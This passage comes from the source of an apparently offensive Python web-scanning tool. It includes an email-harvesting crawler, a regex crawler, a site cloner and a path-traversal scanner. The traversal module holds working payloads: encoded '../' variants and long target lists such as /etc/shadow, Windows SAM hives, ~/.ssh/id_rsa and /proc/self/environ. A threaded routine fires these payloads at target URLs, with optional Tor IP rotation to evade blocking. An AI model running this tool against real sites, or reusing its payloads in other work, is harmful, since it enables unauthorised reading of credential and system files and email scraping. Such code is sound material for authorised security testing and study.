248 | sys.exit() 249 | 250 | def crawl(self,url, depth, visited_pages=None, visited_js=None, visited_img=None): 251 | try: 252 | if visited_pages is None: 253 | visited_pages = set() 254 | if visited_js is None: 255 | visited_js = set() 256 | 257 | if int(depth) > int(self.max_depth) or url in visited_pages or not formats.validate_url(url) or url in self.urls: 258 | return 259 | 260 | visited_pages.add(url) 261 | self.urls.append(url) 262 | try: 263 | headers = { 264 | "User-Agent" : self.user_agent, 265 | "cookie" : self.cookie 266 | } 267 | 268 | proxy_setting = { 269 | "http" : None, 270 | "https" : None 271 | } 272 | 273 | if self.proxy_setting: 274 | proxy_setting = { 275 | "http" : self.proxy_setting, 276 | "https" : self.proxy_setting 277 | } 278 | if self.change_tor_ip: 279 | tor_conf.change_ip() 280 | 281 | response = requests.get(url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 282 | detected_emails = formats.validate_email(response.text) 283 | if detected_emails: 284 | msg.warning(f"url: {url} contains:") 285 | msg.success(detected_emails) 286 | for email in detected_emails: 287 | if email not in self.emails: 288 | self.emails.append(email) 289 | 290 | except Exception as e: 291 | msg.error(" " * (depth * 2) + f"Error fetching {url}: {e}") 292 | return 293 | 294 | soup = BeautifulSoup(response.text, 'html.parser') 295 | 296 | for link in soup.find_all('a', href=True): 297 | new_url = urljoin(url, link['href']) 298 | self.crawl(new_url, depth + 1, visited_pages) 299 | 300 | for script in soup.find_all('script', src=True): 301 | js_url = urljoin(url, script['src']) 302 | self.crawl(js_url, depth + 1, visited_pages) 303 | except KeyboardInterrupt: 304 | msg.error("Stopped by user!") 305 | sys.exit() 306 | 307 | class regx: 308 | def __init__(self,target_url,target_url_file,timeout,follow_redirect, cookie, user_agent, tls_validation,proxy_setting, depth, regx_string,change_tor_ip=False): 309 | self.target_url = target_url 310 | self.target_url_file = target_url_file 311 | self.timeout = int(timeout) 312 | self.follow_redirect = follow_redirect 313 | self.cookie = cookie 314 | self.user_agent = user_agent 315 | self.tls_validation = tls_validation 316 | self.proxy_setting 
= proxy_setting 317 | self.max_depth = int(depth) 318 | self.regx_string = regx_string 319 | self.urls = [] 320 | self.change_tor_ip = change_tor_ip 321 | 322 | def is_alive(self,target_url): 323 | try: 324 | headers = { 325 | "User-Agent" : self.user_agent, 326 | "cookie" : self.cookie 327 | } 328 | 329 | proxy_setting = { 330 | "http" : None, 331 | "https" : None 332 | } 333 | 334 | if self.proxy_setting: 335 | proxy_setting = { 336 | "http" : self.proxy_setting, 337 | "https" : self.proxy_setting 338 | } 339 | if self.change_tor_ip: 340 | tor_conf.change_ip() 341 | 342 | res = requests.get(target_url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 343 | return True 344 | except Exception as e: 345 | msg.error(e) 346 | return False 347 | 348 | def scanner(self): 349 | try: 350 | single_or_multiple_url = 0 351 | if self.target_url: 352 | msg.info(f"starting single scan for url {self.target_url}") 353 | single_or_multiple_url = 0 354 | elif self.target_url_file: 355 | msg.info(f"starting scan for url into the file {self.target_url_file}") 356 | single_or_multiple_url = 1 357 | elif not self.regx_string: 358 | msg.error("no regx string not detected, use --regx arg") 359 | sys.exit() 360 | else: 361 | msg.error("no url detected, use --url or --url-file args") 362 | sys.exit() 363 | 364 | if single_or_multiple_url == 1 : 365 | file = Path(self.target_url_file) 366 | if not file.is_file(): 367 | msg.error(f"file {self.target_url_file} not found!") 368 | sys.exit() 369 | urls_from_file = open(self.target_url_file,"r").read() 370 | for url in urls_from_file.split("\n"): 371 | if formats.validate_url(url): 372 | self.crawl(url,0) 373 | msg.info("done!") 374 | 375 | else: 376 | if not formats.validate_url(self.target_url): 377 | msg.error(f"url {self.target_url} is invalid!") 378 | sys.exit() 379 | 380 | if self.is_alive(self.target_url): 381 | msg.info(f"Connection success for url {self.target_url}") 382 | self.crawl(self.target_url,0) 383 | msg.info("done!") 384 | except KeyboardInterrupt: 385 | msg.error("Stopped by user!") 386 | sys.exit() 387 | 388 | def crawl(self,url, depth, visited_pages=None, visited_js=None, visited_img=None): 389 | try: 390 | 391 | if visited_pages is None: 392 | visited_pages = set() 393 | if visited_js is None: 394 | visited_js = set() 395 | if visited_img is None: 396 | visited_img = set() 397 | 398 | if int(depth) > int(self.max_depth) or url in visited_pages or not formats.validate_url(url) or url in self.urls: 399 | return 400 | 401 | visited_pages.add(url) 402 | self.urls.append(url) 403 | try: 404 | headers = { 405 | "User-Agent" : self.user_agent, 406 | "cookie" : self.cookie 407 | } 408 | 409 | proxy_setting = { 410 | "http" : None, 411 | "https" : None 412 | } 413 | 414 | if self.proxy_setting: 415 | proxy_setting = { 416 | "http" : self.proxy_setting, 417 | "https" : self.proxy_setting 418 | } 419 | if self.change_tor_ip: 420 | tor_conf.change_ip() 421 | 422 | response = requests.get(url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 423 | detected_regx = re.findall(self.regx_string,response.text) 424 | 425 | if detected_regx: 426 | msg.warning(f"url: {url} contains:") 427 | msg.success(detected_regx) 428 | except Exception as e: 429 | msg.error(" " * (depth * 2) + f"Error fetching {url}: {e}") 430 | return 431 | 432 | soup = BeautifulSoup(response.text, 'html.parser') 433 | 434 | for link in 
soup.find_all('a', href=True): 435 | new_url = urljoin(url, link['href']) 436 | self.crawl(new_url, depth + 1, visited_pages) 437 | 438 | for script in soup.find_all('script', src=True): 439 | js_url = urljoin(url, script['src']) 440 | self.crawl(js_url, depth + 1, visited_pages) 441 | 442 | for img in soup.find_all('img', src=True): 443 | img_url = urljoin(url, img['src']) 444 | self.crawl(img_url, depth + 1, visited_pages) 445 | 446 | except KeyboardInterrupt: 447 | msg.error("Stopped by user!") 448 | sys.exit() 449 | 450 | class clone: 451 | def __init__(self,target_url,timeout,user_agent,tls_validation,proxy_setting,project_name,change_tor_ip=False): 452 | self.target_url = target_url 453 | self.project_name = project_name 454 | self.timeout = int(timeout) 455 | self.user_agent = user_agent 456 | self.tls_validation = tls_validation 457 | self.proxy_setting = proxy_setting 458 | self.change_tor_ip = change_tor_ip 459 | 460 | def save(self,url, content, base_dir='site'): 461 | try: 462 | parsed = urlparse(url) 463 | path = parsed.path if parsed.path not in ("", "/") else "/index.html" 464 | 465 | if not path or path == "/": 466 | path = "/index.html" 467 | elif path.endswith("/"): 468 | path = path + "index.html" 469 | elif not os.path.splitext(path)[1]: 470 | path += ".html" 471 | 472 | file_path = os.path.join(base_dir, parsed.netloc, path.lstrip('/')) 473 | os.makedirs(os.path.dirname(file_path), exist_ok=True) 474 | with open(file_path, 'wb') as f: 475 | f.write(content) 476 | msg.info(f"Saved: {file_path}") 477 | except KeyboardInterrupt: 478 | msg.error("Stopped by user!") 479 | sys.exit() 480 | 481 | def scanner(self): 482 | try: 483 | visited = set() 484 | queue = deque([self.target_url]) 485 | domain = urlparse(self.target_url).netloc 486 | 487 | while queue: 488 | url = queue.popleft() 489 | if url in visited: 490 | continue 491 | visited.add(url) 492 | 493 | try: 494 | headers = { 495 | "User-Agent" : self.user_agent 496 | } 497 | 498 | proxy_setting = { 499 | "http" : None, 500 | "https" : None 501 | } 502 | 503 | if self.proxy_setting: 504 | proxy_setting = { 505 | "http" : self.proxy_setting, 506 | "https" : self.proxy_setting 507 | } 508 | if self.change_tor_ip: 509 | tor_conf.change_ip() 510 | 511 | response = requests.get(url,headers=headers, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 512 | except Exception as e: 513 | return 514 | 515 | r = random_data() 516 | if not self.project_name: 517 | self.project_name = r.RandomStrings() 518 | 519 | self.save(url, response.content, self.project_name) 520 | 521 | if 'text/html' not in response.headers.get('Content-Type', ''): 522 | continue 523 | 524 | soup = BeautifulSoup(response.text, 'html.parser') 525 | 526 | for tag in soup.find_all(['a', 'img', 'script', 'link']): 527 | attr = 'href' if tag.name in ['a', 'link'] else 'src' 528 | next_url = tag.get(attr) 529 | if not next_url: 530 | continue 531 | next_url = urljoin(url, next_url) 532 | if urlparse(next_url).netloc == domain and next_url not in visited: 533 | queue.append(next_url) 534 | except KeyboardInterrupt: 535 | msg.error("Stopped by user!") 536 | sys.exit() 537 | -------------------------------------------------------------------------------- /core/traversal.py: -------------------------------------------------------------------------------- 1 | import requests, sys 2 | from core.core import msg, tor_conf 3 | from core.validate import formats 4 | from pathlib import Path 5 | import concurrent.futures 6 | from urllib.parse import 
urlparse, urlunparse 7 | import posixpath 8 | import urllib3 9 | urllib3.disable_warnings() 10 | 11 | class payloads: 12 | encoded_traversal_strings = [ 13 | "/", 14 | "../", 15 | "..\\", 16 | "..\/", 17 | "....//", 18 | "%2e%2e%2f", 19 | "..%252f", 20 | "%252e%252e%252f", 21 | "%c0%ae%c0%ae%c0%af", 22 | "%uff0e%uff0e%u2215", 23 | "%uff0e%uff0e%u2216", 24 | "..././", 25 | "...\.\\", 26 | "%2E%2E%2E%2E%2F%2F", 27 | ".%2e/", 28 | "....////", 29 | "....\/\/", 30 | "%%32%65%%32%65/" 31 | ] 32 | 33 | windows_file_disclosure = [ 34 | "c:/apache/logs/access.log", 35 | "c:/apache/logs/error.log", 36 | "c:/apache/php/php.ini", 37 | "c:/boot.ini", 38 | "c:/MySQL/data/mysql.err", 39 | "c:/MySQL/data/mysql.log", 40 | "c:/MySQL/my.cnf", 41 | "c:/Users/Administrator/NTUser.dat", 42 | "c:/MySQL/my.cnf", 43 | "c:/MySQL/my.ini", 44 | "c:/php4/php.ini", 45 | "c:/php5/php.ini", 46 | "c:/php/php.ini", 47 | "c:/Program Files/Apache Group/Apache2/conf/httpd.conf", 48 | "c:/Program Files/Apache Group/Apache/conf/httpd.conf", 49 | "c:/Program Files/Apache Group/Apache/logs/access.log", 50 | "c:/Program Files/Apache Group/Apache/logs/error.log", 51 | "c:/Program Files/FileZilla Server/FileZilla Server.xml", 52 | "c:/Program Files/MySQL/data/hostname.err", 53 | "c:/Program Files/MySQL/data/mysql-bin.log", 54 | "c:/Program Files/MySQL/data/mysql.err", 55 | "c:/Program Files/MySQL/data/mysql.log", 56 | "c:/Program Files/MySQL/my.ini", 57 | "c:/Program Files/MySQL/my.cnf", 58 | "c:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err", 59 | "c:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log", 60 | "c:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err", 61 | "cC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log", 62 | "c:/Program Files/MySQL/MySQL Server 5.0/my.cnf", 63 | "c:/Program Files/MySQL/MySQL Server 5.0/my.ini", 64 | "c:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf", 65 | "c:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf", 66 | "c:/Program Files (x86)/Apache Group/Apache/conf/access.log", 67 | "c:/Program Files (x86)/Apache Group/Apache/conf/error.log", 68 | "c:/Program Files (x86)/FileZilla Server/FileZilla Server.xml", 69 | "c:/Program Files (x86)/xampp/apache/conf/httpd.conf", 70 | "c:/WINDOWS/php.ini", 71 | "c:/WINDOWS/Repair/SAM", 72 | "c:/Windows/repair/system", 73 | "c:/Windows/repair/software", 74 | "c:/Windows/repair/security", 75 | "c:/WINDOWS/System32/drivers/etc/hosts", 76 | "c:/Windows/win.ini", 77 | "c:/WINNT/php.ini", 78 | "c:/WINNT/win.ini", 79 | "c:/xampp/apache/bin/php.ini", 80 | "c:/xampp/apache/logs/access.log", 81 | "c:/xampp/apache/logs/error.log", 82 | "c:/Windows/Panther/Unattend/Unattended.xml", 83 | "c:/Windows/Panther/Unattended.xml", 84 | "c:/Windows/debug/NetSetup.log", 85 | "c:/Windows/system32/config/AppEvent.Evt", 86 | "c:/Windows/system32/config/SecEvent.Evt", 87 | "c:/Windows/system32/config/default.sav", 88 | "c:/Windows/system32/config/security.sav", 89 | "c:/Windows/system32/config/software.sav", 90 | "c:/Windows/system32/config/system.sav", 91 | "c:/Windows/system32/config/regback/default", 92 | "c:/Windows/system32/config/regback/sam", 93 | "c:/Windows/system32/config/regback/security", 94 | "c:/Windows/system32/config/regback/system", 95 | "c:/Windows/system32/config/regback/software", 96 | "c:/Program Files/MySQL/MySQL Server 5.1/my.ini", 97 | "c:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml", 98 | "c:/Windows/System32/inetsrv/config/applicationHost.config", 99 | ] 100 | 101 | linux_file_disclosure = [ 102 | 
"etc/passwd", 103 | "etc/passwd%00.png", 104 | "etc/passwd%00.jpg", 105 | "etc/passwd%00.php", 106 | "etc/passwd%00.html" 107 | "etc/shadow", 108 | "etc/aliases", 109 | "etc/anacrontab", 110 | "etc/apache2/apache2.conf", 111 | "etc/apache2/httpd.conf", 112 | "etc/at.allow", 113 | "etc/at.deny", 114 | "etc/bashrc", 115 | "etc/bootptab", 116 | "etc/chrootUsers", 117 | "etc/chttp.conf", 118 | "etc/cron.allow", 119 | "etc/cron.deny", 120 | "etc/crontab", 121 | "etc/cups/cupsd.conf", 122 | "etc/exports", 123 | "etc/fstab", 124 | "etc/ftpaccess", 125 | "etc/ftpchroot", 126 | "etc/ftphosts", 127 | "etc/groups", 128 | "etc/grub.conf", 129 | "etc/hosts", 130 | "etc/hosts.allow", 131 | "etc/hosts.deny", 132 | "etc/httpd/access.conf", 133 | "etc/httpd/conf/httpd.conf", 134 | "etc/httpd/httpd.conf", 135 | "etc/httpd/logs/access_log", 136 | "etc/httpd/logs/access.log", 137 | "etc/httpd/logs/error_log", 138 | "etc/httpd/logs/error.log", 139 | "etc/httpd/php.ini", 140 | "etc/httpd/srm.conf", 141 | "etc/inetd.conf", 142 | "etc/inittab", 143 | "etc/issue", 144 | "etc/lighttpd.conf", 145 | "etc/lilo.conf", 146 | "etc/logrotate.d/ftp", 147 | "etc/logrotate.d/proftpd", 148 | "etc/logrotate.d/vsftpd.log", 149 | "etc/lsb-release", 150 | "etc/motd", 151 | "etc/modules.conf", 152 | "etc/motd", 153 | "etc/mtab", 154 | "etc/my.cnf", 155 | "etc/my.conf", 156 | "etc/mysql/my.cnf", 157 | "etc/network/interfaces", 158 | "etc/networks", 159 | "etc/npasswd", 160 | "etc/passwd", 161 | "etc/php4.4/fcgi/php.ini", 162 | "etc/php4/apache2/php.ini", 163 | "etc/php4/apache/php.ini", 164 | "etc/php4/cgi/php.ini", 165 | "etc/php4/apache2/php.ini", 166 | "etc/php5/apache2/php.ini", 167 | "etc/php5/apache/php.ini", 168 | "etc/php/apache2/php.ini", 169 | "etc/php/apache/php.ini", 170 | "etc/php/cgi/php.ini", 171 | "etc/php.ini", 172 | "etc/php/php4/php.ini", 173 | "etc/php/php.ini", 174 | "etc/printcap", 175 | "etc/profile", 176 | "etc/proftp.conf", 177 | "etc/proftpd/proftpd.conf", 178 | "etc/pure-ftpd.conf", 179 | "etc/pureftpd.passwd", 180 | "etc/pureftpd.pdb", 181 | "etc/pure-ftpd/pure-ftpd.conf", 182 | "etc/pure-ftpd/pure-ftpd.pdb", 183 | "etc/pure-ftpd/putreftpd.pdb", 184 | "etc/redhat-release", 185 | "etc/resolv.conf", 186 | "etc/samba/smb.conf", 187 | "etc/snmpd.conf", 188 | "etc/ssh/ssh_config", 189 | "etc/ssh/sshd_config", 190 | "etc/ssh/ssh_host_dsa_key", 191 | "etc/ssh/ssh_host_dsa_key.pub", 192 | "etc/ssh/ssh_host_key", 193 | "etc/ssh/ssh_host_key.pub", 194 | "etc/sysconfig/network", 195 | "etc/syslog.conf", 196 | "etc/termcap", 197 | "etc/vhcs2/proftpd/proftpd.conf", 198 | "etc/vsftpd.chroot_list", 199 | "etc/vsftpd.conf", 200 | "etc/vsftpd/vsftpd.conf", 201 | "etc/wu-ftpd/ftpaccess", 202 | "etc/wu-ftpd/ftphosts", 203 | "etc/wu-ftpd/ftpusers", 204 | "logs/pure-ftpd.log", 205 | "logs/security_debug_log", 206 | "logs/security_log", 207 | "opt/lampp/etc/httpd.conf", 208 | "opt/xampp/etc/php.ini", 209 | "proc/cpuinfo", 210 | "proc/filesystems", 211 | "proc/interrupts", 212 | "proc/ioports", 213 | "proc/meminfo", 214 | "proc/modules", 215 | "proc/mounts", 216 | "proc/stat", 217 | "proc/swaps", 218 | "proc/version", 219 | "proc/self/net/arp", 220 | "proc/self/cwd/db.json", 221 | "proc/self/cwd/flag.txt", 222 | "proc/self/cwd/app.py", 223 | "proc/self/environ", 224 | "root/anaconda-ks.cfg", 225 | "usr/etc/pure-ftpd.conf", 226 | "usr/lib/php.ini", 227 | "usr/lib/php/php.ini", 228 | "usr/local/apache/conf/modsec.conf", 229 | "usr/local/apache/conf/php.ini", 230 | "usr/local/apache/log", 231 | "usr/local/apache/logs", 232 | 
"usr/local/apache/logs/access_log", 233 | "usr/local/apache/logs/access.log", 234 | "usr/local/apache/audit_log", 235 | "usr/local/apache/error_log", 236 | "usr/local/apache/error.log", 237 | "usr/local/cpanel/logs", 238 | "usr/local/cpanel/logs/access_log", 239 | "usr/local/cpanel/logs/error_log", 240 | "usr/local/cpanel/logs/license_log", 241 | "usr/local/cpanel/logs/login_log", 242 | "usr/local/cpanel/logs/stats_log", 243 | "usr/local/etc/httpd/logs/access_log", 244 | "usr/local/etc/httpd/logs/error_log", 245 | "usr/local/etc/php.ini", 246 | "usr/local/etc/pure-ftpd.conf", 247 | "usr/local/etc/pureftpd.pdb", 248 | "usr/local/lib/php.ini", 249 | "usr/local/php4/httpd.conf", 250 | "usr/local/php4/httpd.conf.php", 251 | "usr/local/php4/lib/php.ini", 252 | "usr/local/php5/httpd.conf", 253 | "usr/local/php5/httpd.conf.php", 254 | "usr/local/php5/lib/php.ini", 255 | "usr/local/php/httpd.conf", 256 | "usr/local/php/httpd.conf.ini", 257 | "usr/local/php/lib/php.ini", 258 | "usr/local/pureftpd/etc/pure-ftpd.conf", 259 | "usr/local/pureftpd/etc/pureftpd.pdn", 260 | "usr/local/pureftpd/sbin/pure-config.pl", 261 | "usr/local/www/logs/httpd_log", 262 | "usr/local/Zend/etc/php.ini", 263 | "usr/sbin/pure-config.pl", 264 | "var/adm/log/xferlog", 265 | "var/apache2/config.inc", 266 | "var/apache/logs/access_log", 267 | "var/apache/logs/error_log", 268 | "var/cpanel/cpanel.config", 269 | "var/lib/mysql/my.cnf", 270 | "var/lib/mysql/mysql/user.MYD", 271 | "var/local/www/conf/php.ini", 272 | "var/log/apache2/access_log", 273 | "var/log/apache2/access.log", 274 | "var/log/apache2/error_log", 275 | "var/log/apache2/error.log", 276 | "var/log/apache/access_log", 277 | "var/log/apache/access.log", 278 | "var/log/apache/error_log", 279 | "var/log/apache/error.log", 280 | "var/log/apache-ssl/access.log", 281 | "var/log/apache-ssl/error.log", 282 | "var/log/auth.log", 283 | "var/log/boot", 284 | "var/htmp", 285 | "var/log/chttp.log", 286 | "var/log/cups/error.log", 287 | "var/log/daemon.log", 288 | "var/log/debug", 289 | "var/log/dmesg", 290 | "var/log/dpkg.log", 291 | "var/log/exim_mainlog", 292 | "var/log/exim/mainlog", 293 | "var/log/exim_paniclog", 294 | "var/log/exim.paniclog", 295 | "var/log/exim_rejectlog", 296 | "var/log/exim/rejectlog", 297 | "var/log/faillog", 298 | "var/log/ftplog", 299 | "var/log/ftp-proxy", 300 | "var/log/ftp-proxy/ftp-proxy.log", 301 | "var/log/httpd/access_log", 302 | "var/log/httpd/access.log", 303 | "var/log/httpd/error_log", 304 | "var/log/httpd/error.log", 305 | "var/log/httpsd/ssl.access_log", 306 | "var/log/httpsd/ssl_log", 307 | "var/log/kern.log", 308 | "var/log/lastlog", 309 | "var/log/lighttpd/access.log", 310 | "var/log/lighttpd/error.log", 311 | "var/log/lighttpd/lighttpd.access.log", 312 | "var/log/lighttpd/lighttpd.error.log", 313 | "var/log/mail.info", 314 | "var/log/mail.log", 315 | "var/log/maillog", 316 | "var/log/mail.warn", 317 | "var/log/message", 318 | "var/log/messages", 319 | "var/log/mysqlderror.log", 320 | "var/log/mysql.log", 321 | "var/log/mysql/mysql-bin.log", 322 | "var/log/mysql/mysql.log", 323 | "var/log/mysql/mysql-slow.log", 324 | "var/log/proftpd", 325 | "var/log/pureftpd.log", 326 | "var/log/pure-ftpd/pure-ftpd.log", 327 | "var/log/secure", 328 | "var/log/vsftpd.log", 329 | "var/log/wtmp", 330 | "var/log/xferlog", 331 | "var/log/yum.log", 332 | "var/mysql.log", 333 | "var/run/utmp", 334 | "var/spool/cron/crontabs/root", 335 | "var/webmin/miniserv.log", 336 | "var/www/log/access_log", 337 | "var/www/log/error_log", 338 | "var/www/logs/access_log", 
339 | "var/www/logs/error_log", 340 | "var/www/logs/access.log", 341 | "var/www/logs/error.log", 342 | "~/.atfp_history", 343 | "~/.bash_history", 344 | "~/.bash_logout", 345 | "~/.bash_profile", 346 | "~/.bashrc", 347 | "~/.gtkrc", 348 | "~/.login", 349 | "~/.logout", 350 | "~/.mysql_history", 351 | "~/.nano_history", 352 | "~/.php_history", 353 | "~/.profile", 354 | "~/.ssh/authorized_keys", 355 | "~/.ssh/id_dsa", 356 | "~/.ssh/id_dsa.pub", 357 | "~/.ssh/id_rsa", 358 | "~/.ssh/id_rsa.pub", 359 | "~/.ssh/identity", 360 | "~/.ssh/identity.pub", 361 | "~/.viminfo", 362 | "~/.wm_style", 363 | "~/.Xdefaults", 364 | "~/.xinitrc", 365 | "~/.Xresources", 366 | "~/.xsession", 367 | ] 368 | 369 | other_path = [ 370 | "cgi-bin/" 371 | ] 372 | 373 | class traversal: 374 | def __init__(self,target_url,target_url_file,timeout,follow_redirect,cookie,user_agent,tls_validation,proxy_setting,max_depth,target_os,threads,min_depth,verbose,custom_path=[],custom_traversal_strings=[],custom_file_disclosure=[],change_tor_ip=False): 375 | self.target_url = target_url 376 | self.target_url_file = target_url_file 377 | self.timeout = int(timeout) 378 | self.follow_redirect = follow_redirect 379 | self.cookie = cookie 380 | self.user_agent = user_agent 381 | self.tls_validation = tls_validation 382 | self.proxy_setting = proxy_setting 383 | self.max_depth = int(max_depth) 384 | self.min_depth = int(min_depth) 385 | self.target_os = target_os 386 | self.threads = threads 387 | self.payloads_list = [] 388 | self.count = 0 389 | self.count2 = 0 390 | self.detected = [] 391 | self.scanned = [] 392 | self.verbose = verbose 393 | self.custom_traversal_strings = custom_traversal_strings 394 | self.custom_path = custom_path 395 | self.custom_file_disclosure = custom_file_disclosure 396 | self.change_tor_ip = change_tor_ip 397 | 398 | 399 | def scanner(self): 400 | try: 401 | single_or_multiple_url = 0 402 | if self.target_url: 403 | msg.info(f"Starting single scan for url {self.target_url}") 404 | single_or_multiple_url = 0 405 | elif self.target_url_file: 406 | msg.info(f"Starting scan for URLs into the file {self.target_url_file}") 407 | single_or_multiple_url = 1 408 | else: 409 | msg.error("no url detected, use --url or --url-file args") 410 | sys.exit() 411 | 412 | if self.min_depth > self.max_depth: 413 | msg.error("--min-depth cant be greater than --max-depth") 414 | sys.exit() 415 | 416 | if single_or_multiple_url == 1 : 417 | file = Path(self.target_url_file) 418 | if not file.is_file(): 419 | msg.error(f"file {self.target_url_file} not found!") 420 | sys.exit() 421 | 422 | self.create_payloads() 423 | msg.success(f"[{self.count}] payloads have been loaded!") 424 | 425 | urls_from_file = open(self.target_url_file,"r").read() 426 | for url in urls_from_file.split("\n"): 427 | if formats.validate_url(url): 428 | if self.normalized_url(url) in self.scanned: 429 | if self.verbose: 430 | msg.info(f"{self.normalized_url(url)} has already been scanned! 
skip...") 431 | pass 432 | else: 433 | self.count2 = 0 434 | msg.warning(f"Scanning url {url}") 435 | with concurrent.futures.ThreadPoolExecutor(max_workers=int(self.threads)) as executor: 436 | future_to_url = {executor.submit(self.check,url,payload): payload for payload in self.payloads_list} 437 | 438 | for future in concurrent.futures.as_completed(future_to_url): 439 | future.result() 440 | self.scanned.append(self.normalized_url(url)) 441 | msg.info("done!") 442 | 443 | else: 444 | if not formats.validate_url(self.target_url): 445 | msg.error(f"url {self.target_url} is invalid!") 446 | sys.exit() 447 | 448 | if self.is_alive(self.target_url): 449 | msg.info(f"Connection success for url {self.target_url}") 450 | self.create_payloads() 451 | msg.success(f"[{self.count}] payloads have been loaded!") 452 | 453 | with concurrent.futures.ThreadPoolExecutor(max_workers=int(self.threads)) as executor: 454 | future_to_url = {executor.submit(self.check,self.target_url,payload): payload for payload in self.payloads_list} 455 | 456 | for future in concurrent.futures.as_completed(future_to_url): 457 | future.result() 458 | 459 | msg.info("done!") 460 | except KeyboardInterrupt: 461 | msg.error("Stopped by user!") 462 | sys.exit() 463 | 464 | def normalized_url(self,url): 465 | parsed = urlparse(url) 466 | parsed = parsed._replace(query="") 467 | new_path = posixpath.join(posixpath.dirname(parsed.path), '') 468 | new_parsed = parsed._replace(path=new_path) 469 | new_url = urlunparse(new_parsed) 470 | return new_url 471 | 472 | def payloads(self,os_payloads=[],traversal_string_list=[],path_list=[]): 473 | if int(self.min_depth) > int(self.max_depth): 474 | return 475 | 476 | for o in path_list: 477 | for s in traversal_string_list: 478 | for p in os_payloads: 479 | data = f"{o}{s * self.min_depth}{p}" 480 | self.payloads_list.append(data) 481 | self.count = self.count + 1 482 | 483 | for s in traversal_string_list: 484 | for p in os_payloads: 485 | data = f"{s * self.min_depth}{p}" 486 | self.payloads_list.append(data) 487 | self.count = self.count + 1 488 | 489 | self.min_depth=self.min_depth+1 490 | self.payloads(os_payloads,traversal_string_list,path_list) 491 | 492 | 493 | def create_payloads(self): 494 | custom_traversal_strings_list = payloads.encoded_traversal_strings 495 | if self.custom_traversal_strings: 496 | msg.info("custom path traversal string detected") 497 | custom_traversal_strings_list = self.custom_traversal_strings 498 | 499 | custom_path_list = payloads.other_path 500 | if self.custom_path: 501 | msg.info("custom path detected") 502 | custom_path_list = self.custom_path 503 | 504 | if self.custom_file_disclosure: 505 | msg.info("custom file disclosure detected") 506 | self.payloads(self.custom_file_disclosure,custom_traversal_strings_list,custom_path_list) 507 | else: 508 | if self.target_os.lower() =='linux': 509 | msg.info("Loading linux path traversal payloads") 510 | self.payloads(payloads.linux_file_disclosure,custom_traversal_strings_list,custom_path_list) 511 | 512 | elif self.target_os.lower() == 'windows': 513 | msg.info("Loading windows path traversal payloads") 514 | self.payloads(payloads.windows_file_disclosure,custom_traversal_strings_list,custom_path_list) 515 | else: 516 | msg.info("Loading linux and windows path traversal payloads") 517 | self.payloads(payloads.windows_file_disclosure,custom_traversal_strings_list,custom_path_list) 518 | self.payloads(payloads.linux_file_disclosure,custom_traversal_strings_list,custom_path_list) 519 | 520 | def 
is_alive(self,target_url): 521 | try: 522 | headers = { 523 | "User-Agent" : self.user_agent, 524 | "cookie" : self.cookie 525 | } 526 | 527 | proxy_setting = { 528 | "http" : None, 529 | "https" : None 530 | } 531 | 532 | if self.proxy_setting: 533 | proxy_setting = { 534 | "http" : self.proxy_setting, 535 | "https" : self.proxy_setting 536 | } 537 | if self.change_tor_ip: 538 | tor_conf.change_ip() 539 | 540 | res = requests.get(target_url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 541 | return True 542 | except Exception as e: 543 | msg.error(e) 544 | return False 545 | 546 | def check(self,url,payload): 547 | print(f"Running [{self.count2}/{self.count}] ",end="\r") 548 | 549 | if url in self.detected: 550 | return 551 | 552 | try: 553 | headers = { 554 | "User-Agent" : self.user_agent, 555 | "cookie" : self.cookie 556 | } 557 | 558 | proxy_setting = { 559 | "http" : None, 560 | "https" : None 561 | } 562 | 563 | if self.proxy_setting: 564 | proxy_setting = { 565 | "http" : self.proxy_setting, 566 | "https" : self.proxy_setting 567 | } 568 | 569 | if self.change_tor_ip: 570 | tor_conf.change_ip() 571 | 572 | response = requests.get(url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 573 | 574 | new_url = "" 575 | if "FUZZ" in url: 576 | new_url = url.replace("FUZZ",payload) 577 | else: 578 | parsed = urlparse(url) 579 | parsed = parsed._replace(query="") 580 | new_path = posixpath.join(posixpath.dirname(parsed.path), payload) 581 | new_parsed = parsed._replace(path=new_path) 582 | new_url = urlunparse(new_parsed) 583 | 584 | if self.verbose: 585 | msg.normal(new_url) 586 | 587 | response2 = requests.get(new_url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 588 | 589 | if response2.status_code == 200 and len(response.text) != len(response2.text): #and response2.headers["Content-Type"]=="text/plain": 590 | msg.warning(f"Interesting response detected at [{url}] with payload [{payload}], status code {response2.status_code} and Content-Length {len(response2.text)} != {len(response.text)} ") 591 | self.detected.append(url) 592 | msg.success(f"first 31 chars [{response2.text[0:31]}]") 593 | except Exception as e: 594 | if self.verbose: 595 | msg.error(e) 596 | pass 597 | self.count2 = self.count2 +1 598 | 599 | 600 | --------------------------------------------------------------------------------